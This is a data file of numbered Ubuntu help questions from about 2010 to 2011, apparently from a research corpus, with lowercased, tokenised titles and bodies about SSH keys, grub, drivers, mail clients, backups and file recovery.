25170	looking for pageant equivalent	i was wonder if there is an equivalent to pageant for ubuntu , for those of you who are unfamiliar with this tool , its basically a tool that runs and types in your password for public and private keys . i know alot of you are going to say why do you need passwords on your keys . please and thank you .
25173	facebook and gmail stop working after 10 minutes	i have problems with facebook and gmail only : it works fine and lets me log in , view the content , read new messages , etc . but after 5-10 minutes it does n't load at all : this webpage is not available . the webpage at http : //www.facebook.com/ might be temporarily down or it may have moved permanently to a new web address . more information on this error below is the original error message error 101 ( net : :err_connection_reset ) : unknown error after deleting cookies this problem disappears for 5-10 minutes , then i get the same error . it happens with google chrome and firefox . ping works fine . i have checked system â preferences â network proxy , it 's set to the default : `` direct internet connection '' . then i ran the test at chrome : //net-internals/ # tests and got some `` fail '' results use system proxy settings disable ipv6 host resolving probe for ipv6 host resolving ipv6 is disabled .
25174	how can i remove the first line of a file with sed ?	the following lines append the content of essay_i.txt to the end of essay1.txt ; touch essay1.txt for ( ( i = 1 ; i < = 10 ; i++ ) ) ; do sed '2p ' essay_ '' $ { i } '' .txt > > essay1.txt done how should i change it so that the first line of each of essay_i.txt are not copied ( i.e . only copy line 2- > end ) ?
25175	how can i access ubuntuone contacts and notes with python ?	i want to use ubuntuone in my own python application . i want to access contacts and maybe store other data . but i could not find any documentation or ( python ) examples . how can i use this ?
25176	chkrootkit says /sbin/init is infected , what does that mean ?	i recently ran chkrootkit and got the following line : searching for suckit rootkit ... warning : /sbin/init infected what does this mean exactly ? i heard this was a false positive , what is exactly happening . please and thank you .
25181	which program is stealing my keyboard events ?	i 'm running a fairly new install of 10.04 using a happy hacker keyboard because i 'm an emacs user . i 've already turned off most of the bindings in 'preferences- > keyboard shortcuts ' and modified the layout options 'preferences- > keyboard ' to set 'meta is mapped to win keys ' . everything is working well except some rat b*stard program is stealing -n and -m. this seems to cause a sort of inverse video effect in both cases , with -n affecting only the current window and -m affecting the entire desktop , so i suspect that this is the window manager but i ca n't figure out where this might be configured so i can change it . anybody got any ideas ?
25186	how to move files over samba share with gnomevfs cli	ok i am in the process of backing up my film collection to a nas and i wanted to automate this as much as possible as i have to work at the same time . i am trying to setup a daily dump of iso 's ready to be converted overnight . i would like to do this as a cron job using gnomevfs . i have been able to connect and do an ls command successfully with gnomevfs-ls smb : //user : workgroup : password @ media-centre/videos/ but i am having trouble setting up a mv command from a local folder to the same shared folder keep getting the usage : gnomevfs-mv < from > < to > quote which is n't particularly informative ; ) any ideas ?
25187	how to make the vt display chinese characters ?	when i use the vt ( ctrl+alt+f1 ) , it will only display replacement characters for chinese , but from the alternative installation cd i can see , that it 's actually possible to display chinese in the vt. how to enable this ?
25189	remote login with graphical display manager ( gdm , lightdm )	is it possible to remotely ( via ssh ) make a login to gdm ? i 'll explain a situation in which i 'd need this : i 'm on my laptop and connect to my desktop via ssh . i realize there are some updates available . i install them all , but i need to reboot the computer . the problem is that once the desktop has rebooted , there will be no gdm session available , since it 's necessary to log in . can i somehow perform the gdm login remotely from my laptop ? edit : i ca n't find freenx for maverick , and i have n't been able to configure x11vnc + vncviewer to work . is n't there an easy way ?
25190	is 'netlogon ' user needed ?	i have a user called netlogon , which must have been automatically created by some application or by ... someone ( ? ) . is it necessary or can i just delete it ?
25193	installing python-sexy ?	i 'm trying to install it by doing sudo apt-get install python-sexy but it tells me this may mean that the package is missing , has been obsoleted , or is only available from another source . i could n't find any info on google so i 'm wondering if this is n't that common . i found something here but if i download it from there it wo n't be up to date i guess . any suggestions ?
25196	stream audio to mobile device	i 'd like to stream the audio from ubuntu 10.10 to my htc desire hd ( android 2.2 ) . i 've seen solutions so far for streaming from audio players , but i 'd like to stream any audio output from the pc to my phone . my use case is for watching tv/films in vlc or online ( bbc iplayer ) in bed , without having to use my surround sound system which is likely to wake up my house mates . i 'm not just talking about music from banshee , but any audio that the system makes . i was thinking that pulseaudio is pretty powerful , is it possible to route audio through that to a mobile device ? can it be done through bluetooth ? cheers in advance !
25197	how to get accurate and clear font display ?	the setting i liked until now is subpixel + 0 hinting . any better idead ?
25200	cloud storage that works with rsnapshot ?	i’ve started using rsnapshot as my backup system for my home pc . i really like the idea of hard links and how they are handled . but i can’t find the best workflow . currently i keep my snapshots on the same partition and will copy the newest snapshot to a pen-drive at the end of the week . cloud storage is what i’m looking for . dropbox doesn’t fit my needs , because there is no way to make dropbox respect hard links — all snapshots are treated as full snapshots . renting a server is pretty expensive , so my question is , are there better alternatives for backup in the cloud ? i would like to benefit from hard links and send only incremental backups , just like i do with my local host .
25203	how to disable a touchpad on an acer travelmate 6492 ?	i think it 's broken because it starts working in the same way when i install their drivers in windows . it 's an acer travelmate 6492 . i want to disable it because i think that is broken , however i 'm going to write what happens and if someone knows what could be wrong if it 's not physically broken , can tell me how to solve it . well , the main problem is that is scrolling all down every time so i ca n't do almost anything . i 've tried to remove xserver-xorg-input-synaptics but it got worse and it was every time pressing enter or something like that so it was very annoying . then when i could repair it , i tried with gpointing-device-settings and gsynaptics , but it continued doing the same even with i disabled it from there . the only thing that seems to have a positive effect is to use x ( whatever ) option instead of gnome when login in and disabling it with xinput . however , it only lasted some minutes before it started working and i had to disable it again . any idea about how can i disable or fix it ? thanks in advance .
25205	will thunderbird become the default mail client in the near future ?	i just want to know if there is a plan to replace evolution with thunderbird until 12.04
25208	toshiba satellite u400 does not resume from suspend	i have upgraded from ubuntu 10.4 to 10.10 and the issue seems to be that when i close my lid i have set the computer to suspend . when i open my lid i get a black screen with the login but keyboard is not working . i am using a toshiba satellite u400 , and did n't manage to find something suspicious at my log files . any ideas ?
25211	realtime kernel running as virtual machine	i read that using a linux kernel ( ubuntu rt kernel ) was able to increase the response time of a java application by 4x . my only problem is that i must run a program that only has a windows installation on the same machine . my question is : will running a rt kernel through a virtual machine on the windows box completely defeat the purpose of using the rt kernel ? thanks , matt
25212	why are window borders so hard to click in ambiance ?	in lucid , i never had this problem . however , with maverick ambiance i 've noticed that the window borders are extremely hard to grab , to resize the window . why is this ? and how would i go about fixing this while still using ambiance ?
25220	flash video problem -- is this an issue with my intel video card ?	when i maximize flash to full screen mode , it lags . the video renders slowly even though the sound is playing smoothly . i think this might be caused by an issue i 'm facing with installing the correct video driver for my computer , an `` hp dv4 2154ca '' . i 've tried to install the driver a couple of times , but the xorg.conf file is still empty no matter what . so my question is , why is this file empty , and how could i generate it correctly for my device ? is this the cause of my video rendering problems in flash ? thanks in advance .
25221	how to shrink windows partition with unmovable files in dual boot installation	to install ubuntu alongside windows 7 , i have to shrink windows 7 partition c : . but due to some unmovable files , i can not shrink as much as i plan by using windows own shrinking tool . i guess many of you who have both oses on the same hard drive must have similar experience . how to solve this problem ? any reference that can help is also appreciated ! thanks and regards ! update : i have identified what unmovable file currently stop further shrinking : \programdata\microsoft\search\data\applications\windows\projects\systemindex\indexer\cifiles\00010015.wid : : $ data if i understand correctly , the file belongs to windows search . can i set up somewhere in windows system settings to temperately eliminate the file and similar ones ( because there are many similar files under the same directory which i guess will also stand in the way of shrinking and unmovable by defrag ) ?
25227	how to recover work lost due to an ubuntu one sync error ?	i had a document that was synchronised by ubuntu one . i edited it yesterday , but when i opened it today it was a month old version . what can i do to recover my work ?
25229	configuring compiz grid ?	apparently there is a way to get an areo snap feature with the grid plugin for compiz . i 've downloaded the advanced configuration files and have selected the plugin in the compiz configuration - even re-mapped the keys because i do n't have a numpad . regardless of what i do , i ca n't get it to work , either by dragging the windows or using the assigned keys . is there something i need to do in addition to these things ?
25231	how do i turn on/off hfs+ journaling ?	how can i turn on/off hfs+ journaling from ubuntu ?
25237	how do you fix a broken/missing icon ( in this case , typing break icon ) ?	it used to work fine in another install of maverick , i do n't know why it 's broken now .
25243	what is a 'distribution ' ?	i am new to ubuntu . in fact , i just started using linux . my question is : what is a distro ?
25244	how to handle brightness trouble on dell inspiron i14r-2265 ?	recently i 've installed ubuntu 10.10 32-bit on my dell inspiron i14r-2265 , but it looks like brightness control is not working . i can change it `` programmatically '' ( fn + brightness key ) , though actual screen brightness shows no effect . i 've tried this advice but it did n't work for me . i actually have no idea how it works ( if hardware is not responsive to software , the way i see it ) , so can someone suggest a solution please ? edit : resolved in 11 . *
25248	setting workspaces in gnome without activating gnome panel ( and workspaces applet )	i 'm using avant window navigator and do n't have any gnome-panel . but , i wan na resize my workspaces from 4x1 to 2x2 . but in the help and other documentation , to do this , i must right click in workspaces applet in gnome panel . can i do this without activating gnome panel ?
25250	will backup using rsync preserve acls ?	i am using backuppc to backup my server . the backups are done using rsyncd . currently , i am not using acls , but i am think it is good to activate it to have finer control over permissions . my question : will backing up my files using rsync preserve the defined acls ? btw , i read an article about acls . they are saying that ubuntu does not support acls with tar . is this real/old or not ? i may not have this problem if i am using rsync . is this right ?
25251	how do i select dwm or fluxbox to start on login ?	i am trying to setup dwm in ubuntu 10.10 . the package is successfully built - and now i am trying to get it up and running . i created the dwm.desktop file with the proper text and the path to the dwm exec is correct . on login screen , i can see dwm as a alternate session : but if i select it , still gnome starts . i even tried another window manager ( fluxbox ) - same problem . i can see and select it in the login screen , but gnome starts up . trying gconftool-2 -s /desktop/gnome/session/required_components/windowmanager dwm -- type string also does nothing . killing the windows manager just restarts it - even if i chvt first . also , do n't see the xinit daemon running . any ideas ? this setup was trivial in debian , and older versions of ubuntu . what changed ? i am guessing gnome integration is to blame - but am clueless as of now .
25252	grub-pc installing error	trying to fix my apt-get upgrade , it always stopped at setting up grub-pc ... i read somewhere that i should purge remove my grub2 and then reinstall it . i did that and after lots of paying around i was able to remove it ( was n't such a smart move ) . now i ca n't get it to install again . i am trying sudo apt-get install grub-pc and it just stops at `` setting up grub-pc.. '' and does nothing and because of this it is n't allowing me to do any kind of upgrade or install.. it asks me to sudo dpkg -- configure -a which again stops at setting up grub-pc i think i need help and real soon . thanks , i really appreciate any inputs here to get my system in place before the next reboot .
25254	networking disabled	hi i have internet working but the network manager applet in the ubuntu 10.10 says that it is disabled and i am not able to enable it however i have previously forced the ip address which i am still getting in ifconfig but in wired section of network connections there is no such interface as eth0 where can i see these settings and how can i enable the network manager applet in the title bar thanks in advance
25256	will utouch work on a dell inspiron duo ?	i installed ubuntu ( netbook and desktop ) + utouch on my brand new dell inspiron duo ( hybrid netbook/tablet ) . but utouch doenot seem to work on my dell ? can anyone help on how to get it work ? thx in advance rolf
25258	my processor is not detected intel core 2 duo	my processor is not detected intel core 2 duo when i type $ uname -m -p i get this i686 unknown i have ubuntu 10.10 netbook remix but the cat /proc/cpuinfo gives right identification of two processors as below processor : 0 vendor_id : genuineintel cpu family : 6 model : 15 model name : intel ( r ) core ( tm ) 2 cpu t5600 @ 1.83ghz stepping : 6 cpu mhz : 1826.000 cache size : 2048 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm lahf_lm dts tpr_shadow bogomips : 3657.99 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 6 model : 15 model name : intel ( r ) core ( tm ) 2 cpu t5600 @ 1.83ghz stepping : 6 cpu mhz : 1826.000 cache size : 2048 kb physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm lahf_lm dts tpr_shadow bogomips : 3657.53 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : the problem is with programs that uses more than one core like virtualbox and bitcoin which refuses to use more than one core is there anythign wrong or anything that i can do ? my installation is from a live usb iso on a usb
25260	evolution can not send mail from yahoo or hotmail	i recently installed ubuntu and set up evolution e-mail . although i can receive incoming email perfectly , i ca n't send any messages . these just go to the evolution outbox and stay there . i am using several e-mail addresses : hotmail , gmail , yahoo and sky . gmail and sky now work , ( i.e. , e-mail can be received and sent ) but hotmail ( my primary e-mail address ) and yahoo will only receive . what could i have misconfigured when setting the system up ?
25263	how can i make gwibber use desktop couch ?	i want to make use ubuntuone to sync my data . i saw that gwibber can use desktopcouch to sync accounts , messages and preferences , but gwibber stores all data in a sqlite file . the databases in my couchdb are empty . how can i start gwibber to make use of couchdb ?
25265	how should i install tex-live 2010 on top of the existing installation ?	i found the install-tl script , but it installs texlive into /usr/local . can i trick it into installing it on top the current texlive 2009 installation ? ps . does anyone think it si worth the trouble ?
25266	printing from a pixma ip1900 printer says `` printer stopped ''	i have installed the drivers for pixma ip1900 printer , printed a test page , but when i try to print a document fromm open office i get a message saying 'printer stopped ' . i am running 10.10 maverick meerkat . can you help please ? the drivers i am using are for karmic koala , does this make a difference ? i have installed cnijfilter-common_3.00-1_i386.deb and cnijfilter-ip1900series_3.00-1_i386.deb . i installed them with a deb installer in synaptic package manager .
25268	how do i get wingpanel to replace the default gnome panel ?	i 've installed wingpanel , but as i launch it , the regular gnome panel wo n't disappear . i also tried wingpanel -- replace but it does n't change the situation . however , when executing killall gnome-panel , for those few seconds of a panel free desktop , the wingpanel appears on the top right corner , just to disappear as gnome panel is restored . any advice on how to make this work is appreciated .
25271	what does 'nice ' mean on the processes tab	what does the 'nice ' column represent on the processes tab of the system monitor ?
25277	unable to connect to remote server via ssh ( requires public key )	so i 've been given access to ssh a server . i have the username/password , but server apparently requires a public key ( now bear in mind that i am a noob in ssh ) . when i do : ssh -p 52 user @ server.com terminal says permission denied ( publickey ) . so i went using ssh-keygen -t rsa and got myself the id_rsa and id_rsa.pub files in /root/.ssh . chmoded /root/.ssh to 700 and /root/.ssh/* to 600 . tried sshing server.com again , same error . what am i missing ? i 've been given a putty pagant key file ( .ppk ) by the sysadmin of server.com . apparently , other users ( all windows ) can connect using putty pagant.exe . please help : )
25283	location of partitions in dual-boot installation	in my hard drive , the current partitions from left to right are : small primary partition for windows booting ( 1.17gb ) , big primary partition c : for windows system files ( 116 gb ) , 115.8 gb unallocated space . on the unallocated space , i plan to create a big data partition d : for windows which will be mounted in ubuntu , and some partitions for installing ubuntu . i was wondering which way is better , d : on left of partitions of ubuntu , or d : on right of partitions of ubuntu ? why ? thanks !
25285	is ubuntuone encrypted ?	a simple question : is the connection between client and server encrypted and are the stored data on the server encrypted ?
25286	staying focussed - any applications to monitor what windows are open , record the titles and then tell you what you spend you day doing ?	i am bad at procrastination . i 'm always opening new tabs to check out hackernews or something . so i 've installed stayfocussed on chromium , so that i ca n't view more than x minutes of certain sites . is there something like this for the ubuntu desktop ? it would work with applications , not websites ( obviously ) . i would like an application that would monitor what windows i have open or visible , and limit me to only certain applications . maybe give warnings if i spend to much time looking at irc or something . is there any applications for that ?
25297	how can i force the name of cd-drive ?	how can i force the name of cd-drive ? i am trying to install one game with wine , which has three discs . it works until installation wants disk 2 . then it ca n't continue , because disk 2 appears as drive `` game_2 '' .
25300	skip ahead during playback with keyboard shortcuts	i 'm running rhythmbox under ubuntu 10.04 . i am looking for a way to map a keyboard shortcut to advancing a track by a specified amount of time , say 20-30 seconds . the goal is to be able to press alt+nexttrackkey and skip embedded ads in podcasts . i 'm using rhythmbox but am willing to change to banshee if that would be easier .
25302	error after upgrade to 11.04 from 10.10 - does not mount volumes correctly	i upgraded my ubuntu version from 10.10 to 11.04 alpha and on reboot got an error `` the disk drive for / is not ready yet or not present continue to wait ; or press s to skip mounting or m for manual recovery . when i press m i get the normal command prompt , how do i get the correct drive mounted ? ?
25304	how to set up an ethernet and wireless network using /etc/network/interfaces ?	currently i have ethernet and wireless networks configured through a network manager ( further nm ) but it seems to be a bit buggy ( i need a different mac for ether which is never applied if using nm ) , so i would like to move all the network configs to interfaces file . i know ( or can google for ) configuration code , but i 'm not sure how nm works and it looks like it overrides interface config . please advice , how i can handle this issue . note : i also would like to be able to locate and connect to various wireless networks but not sure how to do it .
25305	wifi does not turn on	i recently installed ubuntu 10.10 along side of my hp pavilion dv6 windows 7 . for what ever reason it states that there is no hard ware for the wifi and it is disabled . the only way for it to work is to have the wifi on during windows then reboot it ( which is very unproductive ) is there any fix for it ?
25306	using btrfs in raid arrays and partitioning	probably stupid questions but here goes : can btrfs use only a portion of a hdd in a raid `` array '' ? i have 3 hdds : 80gb , 160gb , and 200gb external usb . i want to put root+boot in the first 20gb of the smallest drive on ext4 and use the rest of the free space on all 3 drives for a btrfs `` raid10 array '' . is this possible ? is this sane ? would you do it differently ?
25307	how do i fix `` the package lists or status file could not be parsed or opened '' during an update ?	i have a problem with the update-manager . it gives the following message error : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/dk.archive.ubuntu.com_ubuntu_dists_maverick_universe_binary-i386_packages , e : the package lists or status file could not be parsed or opened .
25309	why does n't evolution send outgoing emails ?	i have recently installed ubuntu 10.10 but have had a problem with the evolution e-mail system which accepts incoming e-mails perfectly but will not sent any outgoing e-mails . when i attempt to send an e-mail message this just moves to the outbox and stays there . what could i have done wrong when setting up evolution to have caused this ?
25311	best tool to recover removed files	using ubuntu 10.10 , i have a startup script that automatically removes my 'working directory ' . this is a simple folder on my desktop where i place a bunch of files that i use throughout the day . these are temporary files i need to store just for that one session . in order to keep things clean , my startup script does : rm -rf /home/user/desktop/workdir mkdir /home/user/desktop/workdir works great . till the moment i had some important files there and forgot to move them before shutting down . a few ( 2-3 ) sessions ago this happened and i now realize i need to recover the `` workdir '' directory . but several new ones have been created and removed in the meantime . what is the best way to recover this - if possible ? i read about tools like scalpel but it seems they will scan my whole hd . i know the name of the folder and would like to just look for this workdir folder . what is best ? update - attempt with foremost i have used foremost to try to recover my files . i used : sudo foremost -a -t doc -i /dev/sda1 -o/home/user/desktop/foremost apparently , i have been removing many documents . so many files were recovered that i had to remove other files on the fly in order to not fill up my hard drive . over 30gb of xls/ppt/ole ( ? ) /word files were restored . i had to break off the restore process . for word documents , i have now over 7gb in 3,050 files . how to i get to the right file ? they are all numbered , and the date of modification is today for all files . also , i need to restore 3 other jpg files as well . this might become an ever larger set of files . how can i only recover what was removed in the last week ? or by using the original filename , is that possible ?
25321	how do i install drivers for an amd radeon hd 6450 ?	i bought new computer . the graphics card is amd radeon hd 6450 , on windows 7 it works fine but i try to install driver on ubuntu , and it says that `` no supported adapters detected '' . i downloaded the driver from here . after installing `` aditional drivers '' says that driver is installed . also my screen resolution in ubuntu is not maximum . can you help me install proper driver , please ? thanks in advance !
25326	will 11.04 come along with up to date gnome shell packages ?	will ubuntu 11.04 come along with up to date gnome-shell packages ?
25328	unable to upgrade from lucid lynx to maverick meerkat	i have got a problem with update manager . i 'm running lucid lynx ver . 10.04.2 and i 'm unable to upgrade it to 10.10 version . i have got this message when trying to upgr . : this can be caused by : upgrading to a pre-release version of ubuntu running the current pre-release version of ubuntu unofficial software packages not provided by ubuntu i could n't accidentally download pre-released updates or unsupported updates cause both of those options stays 'unticked ' in software sources/updates , so that ca n't be that . edit : those options stayed disable . i have never enabled them . unofficial software packages then ? if yes , how to find which of them i have to get rid off ? my current ubuntu version is : 10.04.2 lts thanks
25330	graphics problem and no volume control icon after installation	after my installation , i saw a message saying 22 files were broken . then a window appeared , and i selected the broken files and removed them . since then , i have n't had a volume control icon on my laptop ( acer extensa5630 ) , and there 's a thick black line on the right side of my window . how can i fix these problems ? please help .
25334	bookmark sync , sync 's then removes bookmarks !	i got bookmark sync to work ( sort of ) , now it 'll sync , then remove all bookmarks it had just synced ?
25337	recovering grub	are there some resources that could help me recover from grub2 problems ? i installed ubuntu 10.10 and windows 7 on my hard disk . i had grub2 as the bootloader for both of them . problems with my bios and hard disk caused me to lose my grub settings . my previous linux installation was on the sda5 partition , and i want to be able to recover the grub configuration for it .
25339	configuration tools for multiple monitors for x / linux	i have ubuntu 10.04 running gnome and two monitors . i am wondering if a can get a better multi-monitor configuration tool . the one i have , gnome-display-properties , has too many problems , including : when i swapped my monitors over , the narrower ( external ) one now on the left . there is a width calculation error , such that i have a virtual monitor the width of the wide-monitor on the narrow-monitor and part of the wide monitor . and a virtual narrow-monitor on the remainder of the wide-monitor . also the visible mouse pointer does is not aligned with the active spot , an x offset of one monitor width . i would like , in approximate order of importance : nobugs . to be able to select which is primary monitor . to have multiple configurations . configurations to be automatically selected based on which monitors are attached . configurations to be cycled ( reliably ) when display mode key is pressed . when a display is deactivated , for windows to migrate to remaining monitors . option to not change display resolution when mirroring , but to use side/top blanking bars to pad out screen . chip set info : 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 09 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 09 )
25347	what command do i need to unzip/extract a .tar.gz file ?	i received a huge .tar.gz file from a client that contains about 800 mb of image files ( when uncompressed . ) our hosting company 's ftp is seriously slow , so extracting all the files locally and sending them up via ftp is n't practical . i was able to ftp the .tar.gz file to our hosting site , but when i ssh into my directory and try using unzip , it gives me this error : [ esthers @ clients locations ] $ unzip community_images.tar.gz archive : community_images.tar.gz end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . note : community_images.tar.gz may be a plain executable , not an archive unzip : can not find zipfile directory in one of community_images.tar.gz or community_images.tar.gz.zip , and can not find community_images.tar.gz.zip , period . what command do i need to use to extract all the files in a .tar.gz file ?
25349	how to find out the installation path to my browser ?	i am installing a proprietary cad application ( medusa4 personal ) and the installer wants to know the path to my web browser ( as a prerequisite for online help ) . i have the default firefox installation and chromium , but i do n't know the installation path for any of them , and could n't find them among the usual suspects ( /usr/bin , /usr/lib ) . it would be nice if you could tell me the path to one of them , and even nicer if you can tell me how to find out the installation path to any package managed by apt .
25351	is it possible to install desktop edition in server edition , then access remotely ?	is it possible to install desktop edition in server edition , then access remotely ? i can think of lots of applications for this , but do n't know if it 's possible , or what the drawbacks could be .
25352	why does ubuntu have a separate package for unison version 2.27.57 ?	the current ubuntu repo contains an extra set of packages for version 2.27.57 of the unison file sychronization utility : $ aptitude search unison p unison - a file-synchronization tool for unix and w p unison-gtk - a file-synchronization tool for unix and w p unison2.27.57 - a file-synchronization tool for unix and w p unison2.27.57-gtk - a file-synchronization tool for unix and w $ aptitude show '~nunison [ ^- ] * $ ' | grep 'package\|version' package : unison version : 2.32.52-1ubuntu2 package : unison2.27.57 version : 2.27.57-2 what is the reason for this ? are there backwards incompatibilities in more recent versions of unison ?
25356	decrease filesize when resizing with mogrify	i love the command line options of imagemagick . mogrify is great to resize images and change quality , which is what i use most often . however , i have noted that the filesize if often larger than what it should be . especially with small images . for instance , i have a regular 640px ( width ) photo , which i change to quality 80 and a width of 80px : mogrify -quality 80 -resize 80 file.jpg works well and my image gets resized and the quality is changed to 80 . however , the filesize is around 40kb . for such a tiny image , that is huge ! when i use mtpaint , and open the file and save it ( not changing anything , just ctrl+o , ctrl+s ) , the filesize decreases with more than 95 % to less than 2kb ! i have seen this is often the case . what goes wrong ?
25359	plymouth splash screen different boot than shutdown	the plymouth boot splash screen is off center , although the shut-down one works as i set it ( not original ) . why are my boot plymouth and shut-down plymouths different
25361	in 'apt-cache depends ' output , what is the meaning of suggests , recommends , | , < > ?	i 've checked the man/info page , but there is no reference to some aspects of the output fomat of apt-cache depends the man/info page tried to be helpful ( in an obtuse manner ) ; quote : `` for the specific meaning of the remainder of the output it is best to consult the apt source code '' now in fairness to the info page , that quote was in regards to the 'showpkg ' option which it had reasonably explained , but my option had no such explanation ... i understand that linux info comes from many sources ( not just man/info pages ) , and i do n't particularly want to rummage through the source ( altough somtimes i do ) , so here is an example of what i 'd like to know the meaning of . # i can assume what these mean , but ... # what does | mean ? ( probably means 'or ' ? ? ? ) # what does < pkg > and the following indentations mean ? # at the end , the interaction ( ? ) of suggest and recommends puzzles me . $ apt-cache depends solr-common solr-common depends : debconf |depends : openjdk-6-jre-headless |depends : < java5-runtime-headless > default-jre-headless gcj-4.4-jre-headless gcj-jre-headless gij-4.3 openjdk-6-jre-headless depends : < java6-runtime-headless > default-jre-headless openjdk-6-jre-headless depends : libcommons-codec-java depends : libcommons-csv-java depends : libcommons-fileupload-java depends : libcommons-httpclient-java depends : libcommons-io-java depends : libjaxp1.3-java depends : libjetty-java depends : liblucene2-java depends : libservlet2.5-java depends : libslf4j-java depends : libxml-commons-external-java suggests : libmysql-java |recommends : solr-tomcat recommends : solr-jetty
25372	can i shorten automatic shut down time from 60s to 5 ?	just loaded ubuntu 10.10 and loaded all updates on a hard drive by itself ( without windows ) . would like to change the time for the system to shut down automatically from 60 seconds to 5 seconds , thus just hitting the shutdown icon once and in 5 seconds the system would shut down or give me just enough time to hit the restart button if i wanted to restart . any way to do it ? ?
25374	how do you install mod_wsgi ?	i ran the following commands sudo apt-get install libapache2-mod-wsgi sudo a2enmod mod-wsgi i keep getting this extremely frustrating message error : module mod-wsgi does not exist ! please help .
25380	will applications be putting user data in ~/.config instead of just ~ ?	are there any plans to have applications store data from each user in home/user/.config instead of just home/user/ and their respective directories ?
25390	can i choose to automatically download all updates and install the important ones ?	why ca n't i select both of these ?
25396	setting up a shared media drive	i want to have a shared media drive be transparently usable to all users , whilst also sticking to fhs and ubuntu standards . the former takes priority if necessary . i currently mount it at /media/stuff but /media is supposed to be for external media , i believe . the main issue is setting right permissions so that access to read and write to the drive can be granted to multiple users working within the same directories . installinganewharddrive seems both slightly confused and not what i want . it claims that this sets ownership for the top-level directory ( despite the recursion flag ) : sudo chown -r username : username /media/mynewdrive and that this will let multiple users create files and sub-directories but only delete their own : sudo chgrp plugdev /media/mynewdrive sudo chmod g+w /media/mynewdrive sudo chmod +t /media/mynewdrive however , the group writeable bit does not seem to get inherited , which is troublesome for keeping things organised ( prevents creation inside sub-folders originally made by another user ) . the sticky bit is probably also unwanted for the same reason , although currently it seems that one usera ( perhaps the owner of the mount-point ? ) can delete the userb 's files , but not vice-versa . this is fine , as long as userb can create files inside the directory of usera . so : what is the correct mount point ? is plugdev the correct group ? most importantly , how to set up permissions to maintain an organised media drive ? i do not want to be running cron jobs to set permissions regularly !
25397	virtualbox : why are some usb devices disabled ?	overview : my host os is ubuntu 10.10 and guest os is winxp on the virtualbox version downloaded from oracle including `` virtualbox 4.0 oracle vm virtualbox extension pack '' so that usb passthrough works . this works in general ( i was able to back up my iphone to itunes in the guest os ) , but some devices are n't available even though they 're ptrovided in the virtualbox settings . specifics : in the virtualbox settings for the guest os , there 's the part where you can select which of your usb devices should be visible to the guest os . i 've selected several devices including the iphone . so far so good . then an ios upgrade came along ; my iphone is now in dfu mode ( or recovery mode ? ) and represents itself not as `` iphone '' but as `` iphone ( dfu mode ) '' . i have now also added this device to the list of usb devices that the guest os should see -- but it does n't see this device . the dfu device is listed in the menu of usb devices available to the guest os , but it 's disabled ( greyed out ) ! so i ca n't select it , so the guest os does n't see it . questions : am i right in expecting that the guest os ought to see the dfu device when i add it in the virtualbox settings ? what steps do i need to take so that the guest os will really see the dfu device ? why is the dfu device greyed out , and how do i make it selectable ?
25398	are there tools to manage the power management for hdd ?	i wonder if there are a better tool than the panel at system â preferences â power management to manage the power consumption for the hdd . specifically hdd in a laptop .
25399	modernising settings , packages	the update manager ( possibly combined with the janitor ) does a reasonable job of bringing packages up to date with a new release , removing ones that are replaced by different projects etc . however , i 'm left with the lingering feeling that quite a few settings are lingering from old releases . for example , some packages may be left around that i installed myself whereas now the functionality is provided by default . another example is that my user does n't get the new theme , and the panel bar is a mess . i can compare against an inactive user on the same system : everything seems tidier . there are also things like the explosion of system preferences , user groups ( inactive user , more recently created , is in groups that the older , active user is n't ) . in other areas ( e.g . default font ) i do seem to get given the new defaults . another example is spotlight-equivalent search . i remember beagle and tracker , i remember removing tracker when it used all system ram and swap for 2 entire release cycles , but i do n't know what i 'm `` supposed '' to be using now . is there even a default indexing-search installed and exposed ? aptitude install ubuntu-desktop does n't do anything , so the basics are in place package-wise . is there any way to update my settings to the modern `` ubuntu way '' without reinstalling from scratch ? can i do so selectively i.e . show the differences ? most of the time package management on linux is an absolute joy compared to the alternatives , but if the desktop gets messed up after only a release or two , we 're back to reinstalling just like windows .
25404	how to save filters with png in inkscape	i have created a graphic with multiple layers in inkscape . one of the layers is some text . i have applied a drop shadow filter to the text . when i save the file as png , the drop shadow is not saved . i have also tried applying a gaussian blur to the text layer and to the text layer after converting it to an object . the blur is not applied . how can i save the file as png with the drop shadow intact ?
25406	make global application menu replace titlebar in gnome-panel	i am trying out ubuntu 11.04 , and one of my favourite features is the global application menu . i 'm not a big fan of unity , so i 'm running the classic desktop . while the global application menu is here too , in unity it replaces the titlebar when maximized , giving more screen space . is it possible to have this functionality with gnome-panel ? thanks in advance !
25407	how to remove grub selection ?	i was trying to find /boot/grub/menu.lst or /boot/grub/device.map as usual on ubuntu desktop or other versions to change the grub selection , but there is no file munu.lst or device.map in the grub directory . where can i find grub 's configuration file ? to modify the grub selection
